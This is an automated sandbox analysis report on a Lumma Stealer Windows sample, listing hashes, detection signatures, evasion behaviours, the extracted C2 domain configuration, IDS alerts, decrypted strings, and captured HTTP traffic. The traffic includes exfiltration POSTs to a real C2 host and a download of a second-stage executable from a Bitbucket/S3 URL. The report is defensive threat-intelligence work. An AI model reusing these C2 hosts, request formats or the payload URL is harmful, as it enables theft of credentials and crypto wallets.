Windows Analysis Report
jSFUzuYPG9.exe

Overview

General Information

Sample name: jSFUzuYPG9.exe (renamed because original name is a hash value)
Original sample name: 820f418e980b172684fe96e4aa6e50a5.exe
Analysis ID: 1579761
MD5: 820f418e980b172684fe96e4aa6e50a5
SHA1: a5498979325229c5494a01fddd7e8013750a5ce7
SHA256: 06472667e63bfd7ffdf64b3de9b839207e2b0ab1ae17d60f6a6ad75d6fbd2800
Tags: exe, user-abuse_ch
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • jSFUzuYPG9.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\jSFUzuYPG9.exe" MD5: 820F418E980B172684FE96E4AA6E50A5)
    • WerFault.exe (PID: 8000 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7428 -s 2140 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["rapeflowwj.lat", "energyaffai.lat", "discokeyus.lat", "aspecteirs.lat", "crosshuaht.lat", "sweepyribs.lat", "sustainskelet.lat", "grannyejh.lat", "necklacebudi.lat"], "Build id": "LOGS11--LiveTraffic"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author | Strings
00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: jSFUzuYPG9.exe PID: 7428 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T08:40:38.549640+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49709 | 23.55.153.106 | 443 | TCP
2024-12-23T08:40:40.997004+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49715 | 104.21.66.86 | 443 | TCP
2024-12-23T08:40:42.981050+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49721 | 104.21.66.86 | 443 | TCP
2024-12-23T08:40:45.632810+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49727 | 104.21.66.86 | 443 | TCP
2024-12-23T08:40:48.117262+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49733 | 104.21.66.86 | 443 | TCP
2024-12-23T08:40:50.552331+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49739 | 104.21.66.86 | 443 | TCP
2024-12-23T08:40:53.051762+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49748 | 104.21.66.86 | 443 | TCP
2024-12-23T08:40:55.611278+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49755 | 104.21.66.86 | 443 | TCP
2024-12-23T08:41:00.848841+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49767 | 104.21.66.86 | 443 | TCP
2024-12-23T08:41:03.133628+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49772 | 185.166.143.49 | 443 | TCP
2024-12-23T08:41:05.548672+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49777 | 52.216.152.124 | 443 | TCP
2024-12-23T08:40:41.741365+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 49715 | 104.21.66.86 | 443 | TCP
2024-12-23T08:40:44.039796+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 49721 | 104.21.66.86 | 443 | TCP
2024-12-23T08:41:01.601046+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 49767 | 104.21.66.86 | 443 | TCP
2024-12-23T08:40:41.741365+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.11 | 49715 | 104.21.66.86 | 443 | TCP
2024-12-23T08:40:44.039796+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.11 | 49721 | 104.21.66.86 | 443 | TCP
2024-12-23T08:40:36.428034+0100 | 2058354 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 51180 | 1.1.1.1 | 53 | UDP
2024-12-23T08:40:36.727425+0100 | 2058358 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 55218 | 1.1.1.1 | 53 | UDP
2024-12-23T08:40:35.999353+0100 | 2058360 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 50665 | 1.1.1.1 | 53 | UDP
2024-12-23T08:40:36.285155+0100 | 2058362 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 60253 | 1.1.1.1 | 53 | UDP
2024-12-23T08:40:35.718564+0100 | 2058364 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 65433 | 1.1.1.1 | 53 | UDP
2024-12-23T08:40:36.142280+0100 | 2058370 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 54667 | 1.1.1.1 | 53 | UDP
2024-12-23T08:40:36.867809+0100 | 2058374 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 63590 | 1.1.1.1 | 53 | UDP
2024-12-23T08:40:36.569423+0100 | 2058376 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 60277 | 1.1.1.1 | 53 | UDP
2024-12-23T08:40:35.343969+0100 | 2058378 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 58057 | 1.1.1.1 | 53 | UDP
2024-12-23T08:40:48.992739+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49733 | 104.21.66.86 | 443 | TCP
2024-12-23T08:40:39.420367+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 49709 | 23.55.153.106 | 443 | TCP

                AV Detection

Source: jSFUzuYPG9.exe | Avira: detected
Source: jSFUzuYPG9.exe.7428.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["rapeflowwj.lat", "energyaffai.lat", "discokeyus.lat", "aspecteirs.lat", "crosshuaht.lat", "sweepyribs.lat", "sustainskelet.lat", "grannyejh.lat", "necklacebudi.lat"], "Build id": "LOGS11--LiveTraffic"}
Source: jSFUzuYPG9.exe | ReversingLabs: Detection: 63%
Source: jSFUzuYPG9.exe | Virustotal: Detection: 50%
Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: jSFUzuYPG9.exe | Joe Sandbox ML: detected
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: rapeflowwj.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: crosshuaht.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: sustainskelet.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: aspecteirs.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: energyaffai.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: necklacebudi.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: discokeyus.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: grannyejh.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: sweepyribs.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: LOGS11--LiveTraffic
Source: jSFUzuYPG9.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.11:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49727 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49755 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49767 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.11:49772 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.216.152.124:443 -> 192.168.2.11:49777 version: TLS 1.2
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe | Directory queried: number of queries: 1001

                Networking

Source: Network traffic | Suricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.11:63590 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.11:60253 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.11:65433 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.11:51180 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.11:60277 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.11:58057 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.11:55218 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.11:50665 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.11:54667 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.11:49709 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.11:49721 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49767 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:49715 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49715 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49721 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:49733 -> 104.21.66.86:443
Source: Malware configuration extractor | URLs: rapeflowwj.lat
Source: Malware configuration extractor | URLs: energyaffai.lat
Source: Malware configuration extractor | URLs: discokeyus.lat
Source: Malware configuration extractor | URLs: aspecteirs.lat
Source: Malware configuration extractor | URLs: crosshuaht.lat
Source: Malware configuration extractor | URLs: sweepyribs.lat
Source: Malware configuration extractor | URLs: sustainskelet.lat
Source: Malware configuration extractor | URLs: grannyejh.lat
Source: Malware configuration extractor | URLs: necklacebudi.lat
Source: Joe Sandbox View | IP Address: 104.21.66.86 104.21.66.86
Source: Joe Sandbox View | IP Address: 23.55.153.106 23.55.153.106
Source: Joe Sandbox View | IP Address: 185.166.143.49 185.166.143.49
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49715 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49733 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49709 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49721 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49748 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49772 -> 185.166.143.49:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49727 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49739 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49755 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49767 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49777 -> 52.216.152.124:443
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 53 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=HHOEN70NK | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12799 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=G0ZRODU1MVEYOK | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15041 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=VSKU0NU9BAG1J2 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20410 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=FFVY7DHX236 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1209 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=2LZ5UATFIAIX09 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 588109 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 88 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIZ7XL2U7&Signature=FCPVgbdRXx%2FDjhvQvPzU1dQ3dNE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQDOJENS5X8jDlzsJxuPb2pH5MjLxA952GUpuJ9K8c8eAgIgeBp5O3n2dCArHo7VZBQEhKa5Ybqf7xD1F%2BZzGAepczwqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDIf5Q5o38rOF7VorZiqEApSlSAviV7fqKWYqWG4d0%2BlfrC%2FFb7F%2Fc2GVH68DYRo2vd%2BAREXXJpsY5s%2BmBpFXzm6fy26oRa5GS8wZd9Nc0FYJUoSZjhvzo%2FM%2FM6PUw%2FINg1gRCi7PRFdMEoNyTOkNSC2S8%2FTK1pGG4o8hZEeM8vyBsvr0QE%2FuOcUu5JrCscWEP%2BFIPyeSmLpATVuvDiwsooP38cS3cC5Mhjir0zJP2xZUtK%2BDRPz%2BgACYHXpemn2WCxpgImxr6YWsOyoQOhLS0ii2eBVVjZpJNT1ozD%2FkBPjRAjUAEFa5C8b6hC%2FuETQ%2BEKayEkNgfTaLoNER0YYk%2BLdQYmqD3E5OEWQc3mClPsl8QceiMMSmpLsGOp0BepAG7qOdA1hoVp77QSvDNIy85cM9X4QKinihkh90Gdln%2FwS%2BMi4ynXs5fFObnXard%2B5fkTffWOZz4AAnQ1g4%2FaEEJTRdstxSXhoxukE9KAy%2Fq7WmNCu9sA6P5tOZSc7t6W8LRba2NCA3DkwySsQ7mbpcH%2Fh%2BHvf17xRCK7I%2BtWG4OCa%2FkKK4HempfXWhoX%2BEE2qBiW2nLYzf0Zo0QQ%3D%3D&Expires=1734941260 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https: equals www.youtube.com (Youtube)
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; con equals www.youtube.com (Youtube)
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; con equals www.youtube.com (Youtube)
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Per equals www.youtube.com (Youtube)
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: p.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https:// equals www.youtube.com (Youtube)
                Source: unknown
                HTTP traffic detected: POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: lev-tolstoi.com
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript
